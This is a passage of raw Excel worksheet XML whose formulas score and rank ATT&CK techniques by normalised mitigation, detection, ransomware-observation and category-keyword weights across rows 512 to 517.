        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AS512" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT512" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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13" spans="1:47">
      <c r="A513" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="B513" s="25">
        <f>SUM(H513,M513,V513)*(1+SUM(AE513,AG513,AI513,AK513,AM513))</f>
        <v>0.1198</v>
      </c>
      <c r="C513" s="25" t="s">
        <v>1831</v>
      </c>
      <c r="D513" s="25" t="s">
        <v>1832</v>
      </c>
      <c r="E513" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F513" s="51">
        <v>1</v>
      </c>
      <c r="G513" s="51">
        <v>1</v>
      </c>
      <c r="H513" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I513">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J513">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K513">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L513">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M513" s="25">
        <v>0</v>
      </c>
      <c r="N513" s="51">
        <v>0</v>
      </c>
      <c r="O513" s="51">
        <v>0</v>
      </c>
      <c r="P513" s="51">
        <v>0</v>
      </c>
      <c r="Q513" s="51">
        <v>0</v>
      </c>
      <c r="R513" s="51"/>
      <c r="S513" s="51">
        <v>0</v>
      </c>
      <c r="T513" s="51"/>
      <c r="U513" s="51">
        <v>0</v>
      </c>
      <c r="V513" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W513">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X513">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y513">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z513">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA513">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB513">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC513" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD513" s="25" t="str" cm="1">
        <f t="array" ref="AD513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC513)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE513" s="25">
        <f>IF(AD513="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF513" s="25" t="str" cm="1">
        <f t="array" ref="AF513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC513)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG513" s="25">
        <f>IF(AF513="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH513" s="25" t="str" cm="1">
        <f t="array" ref="AH513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC513)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI513" s="25">
        <f>IF(AH513="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ513" s="25" t="str" cm="1">
        <f t="array" ref="AJ513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC513)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK513" s="25">
        <f>IF(AJ513="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL513" s="25" t="str" cm="1">
        <f t="array" ref="AL513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC513)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM513" s="25">
        <f>IF(AL513="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN513" s="52">
        <v>0</v>
      </c>
      <c r="AO513" s="51">
        <v>0</v>
      </c>
      <c r="AP513" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="AQ513" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AR513" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AS513" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT513" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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14" spans="1:47" ht="32.1">
      <c r="A514" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="B514" s="25">
        <f>SUM(H514,M514,V514)*(1+SUM(AE514,AG514,AI514,AK514,AM514))</f>
        <v>0.1198</v>
      </c>
      <c r="C514" s="25" t="s">
        <v>1833</v>
      </c>
      <c r="D514" s="25" t="s">
        <v>460</v>
      </c>
      <c r="E514" s="25" t="s">
        <v>1834</v>
      </c>
      <c r="F514" s="51">
        <v>1</v>
      </c>
      <c r="G514" s="51">
        <v>1</v>
      </c>
      <c r="H514" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I514">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J514">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K514">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L514">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M514" s="25">
        <v>0</v>
      </c>
      <c r="N514" s="51">
        <v>0</v>
      </c>
      <c r="O514" s="51">
        <v>0</v>
      </c>
      <c r="P514" s="51">
        <v>0</v>
      </c>
      <c r="Q514" s="51">
        <v>0</v>
      </c>
      <c r="R514" s="51"/>
      <c r="S514" s="51">
        <v>0</v>
      </c>
      <c r="T514" s="51"/>
      <c r="U514" s="51">
        <v>0</v>
      </c>
      <c r="V514" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W514">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X514">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y514">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z514">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA514">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB514">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC514" s="29" t="s">
        <v>1835</v>
      </c>
      <c r="AD514" s="25" t="str" cm="1">
        <f t="array" ref="AD514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC514)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE514" s="25">
        <f>IF(AD514="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF514" s="25" t="str" cm="1">
        <f t="array" ref="AF514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC514)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG514" s="25">
        <f>IF(AF514="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH514" s="25" t="str" cm="1">
        <f t="array" ref="AH514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC514)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI514" s="25">
        <f>IF(AH514="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ514" s="25" t="str" cm="1">
        <f t="array" ref="AJ514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC514)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK514" s="25">
        <f>IF(AJ514="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL514" s="25" t="str" cm="1">
        <f t="array" ref="AL514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC514)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM514" s="25">
        <f>IF(AL514="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN514" s="60">
        <v>0</v>
      </c>
      <c r="AO514" s="51">
        <v>0</v>
      </c>
      <c r="AP514" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="AQ514" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AR514" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AS514" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT514" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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15" spans="1:47" ht="32.1">
      <c r="A515" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B515" s="25">
        <f>SUM(H515,M515,V515)*(1+SUM(AE515,AG515,AI515,AK515,AM515))</f>
        <v>0.1</v>
      </c>
      <c r="C515" s="25" t="s">
        <v>1836</v>
      </c>
      <c r="D515" s="25" t="s">
        <v>1046</v>
      </c>
      <c r="E515" s="25" t="s">
        <v>1837</v>
      </c>
      <c r="F515" s="51">
        <v>1</v>
      </c>
      <c r="G515" s="51">
        <v>1</v>
      </c>
      <c r="H515" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I515">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J515">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K515">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L515">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M515" s="25">
        <v>0</v>
      </c>
      <c r="N515" s="51">
        <v>0</v>
      </c>
      <c r="O515" s="51">
        <v>0</v>
      </c>
      <c r="P515" s="51">
        <v>0</v>
      </c>
      <c r="Q515" s="51">
        <v>0</v>
      </c>
      <c r="R515" s="51"/>
      <c r="S515" s="51">
        <v>0</v>
      </c>
      <c r="T515" s="51"/>
      <c r="U515" s="51">
        <v>0</v>
      </c>
      <c r="V515" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W515">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X515">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y515">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z515">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA515">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB515">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC515" s="29" t="s">
        <v>913</v>
      </c>
      <c r="AD515" s="25" t="str" cm="1">
        <f t="array" ref="AD515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE515" s="25">
        <f>IF(AD515="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF515" s="25" t="str" cm="1">
        <f t="array" ref="AF515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG515" s="25">
        <f>IF(AF515="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH515" s="25" t="str" cm="1">
        <f t="array" ref="AH515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI515" s="25">
        <f>IF(AH515="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ515" s="25" t="str" cm="1">
        <f t="array" ref="AJ515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK515" s="25">
        <f>IF(AJ515="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL515" s="25" t="str" cm="1">
        <f t="array" ref="AL515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM515" s="25">
        <f>IF(AL515="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN515" s="52">
        <v>0</v>
      </c>
      <c r="AO515" s="51">
        <v>0</v>
      </c>
      <c r="AP515" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ515" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR515" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS515" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT515" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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16" spans="1:47">
      <c r="A516" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B516" s="25">
        <f>SUM(H516,M516,V516)*(1+SUM(AE516,AG516,AI516,AK516,AM516))</f>
        <v>0.1</v>
      </c>
      <c r="C516" s="25" t="s">
        <v>1838</v>
      </c>
      <c r="D516" s="25" t="s">
        <v>1839</v>
      </c>
      <c r="E516" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F516" s="51">
        <v>1</v>
      </c>
      <c r="G516" s="51">
        <v>1</v>
      </c>
      <c r="H516" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I516">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J516">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K516">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L516">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M516" s="25">
        <v>0</v>
      </c>
      <c r="N516" s="51">
        <v>0</v>
      </c>
      <c r="O516" s="51">
        <v>0</v>
      </c>
      <c r="P516" s="51">
        <v>0</v>
      </c>
      <c r="Q516" s="51">
        <v>0</v>
      </c>
      <c r="R516" s="51"/>
      <c r="S516" s="51">
        <v>0</v>
      </c>
      <c r="T516" s="52" t="s">
        <v>1840</v>
      </c>
      <c r="U516" s="51">
        <v>0</v>
      </c>
      <c r="V516" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W516">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X516">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y516">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z516">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA516">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB516">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC516" s="30"/>
      <c r="AD516" s="25" t="str" cm="1">
        <f t="array" ref="AD516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE516" s="25">
        <f>IF(AD516="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF516" s="25" t="str" cm="1">
        <f t="array" ref="AF516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG516" s="25">
        <f>IF(AF516="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH516" s="25" t="str" cm="1">
        <f t="array" ref="AH516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI516" s="25">
        <f>IF(AH516="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ516" s="25" t="str" cm="1">
        <f t="array" ref="AJ516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK516" s="25">
        <f>IF(AJ516="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL516" s="25" t="str" cm="1">
        <f t="array" ref="AL516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM516" s="25">
        <f>IF(AL516="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN516" s="64">
        <v>0</v>
      </c>
      <c r="AO516" s="51"/>
      <c r="AP516" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ516" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR516" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS516" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT516" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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17" spans="1:47">
      <c r="A517" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B517" s="25">
        <f>SUM(H517,M517,V517)*(1+SUM(AE517,AG517,AI517,AK517,AM517))</f>
        <v>0.1</v>
      </c>
      <c r="C517" s="25" t="s">
        <v>1841</v>
      </c>
      <c r="D517" s="25" t="s">
        <v>1842</v>
      </c>
      <c r="E517" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F517" s="51">
        <v>1</v>
      </c>
      <c r="G517" s="51">
        <v>1</v>
      </c>
      <c r="H517" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I517">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J517">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K517">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L517">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M517" s="25">
        <v>0</v>
      </c>
      <c r="N517" s="51">
        <v>0</v>
      </c>
      <c r="O517" s="51">
        <v>0</v>
      </c>
      <c r="P517" s="51">
        <v>0</v>
      </c>
      <c r="Q517" s="51">
        <v>0</v>
      </c>
      <c r="R517" s="51"/>
      <c r="S517" s="51">
        <v>0</v>
      </c>
      <c r="T517" s="52" t="s">
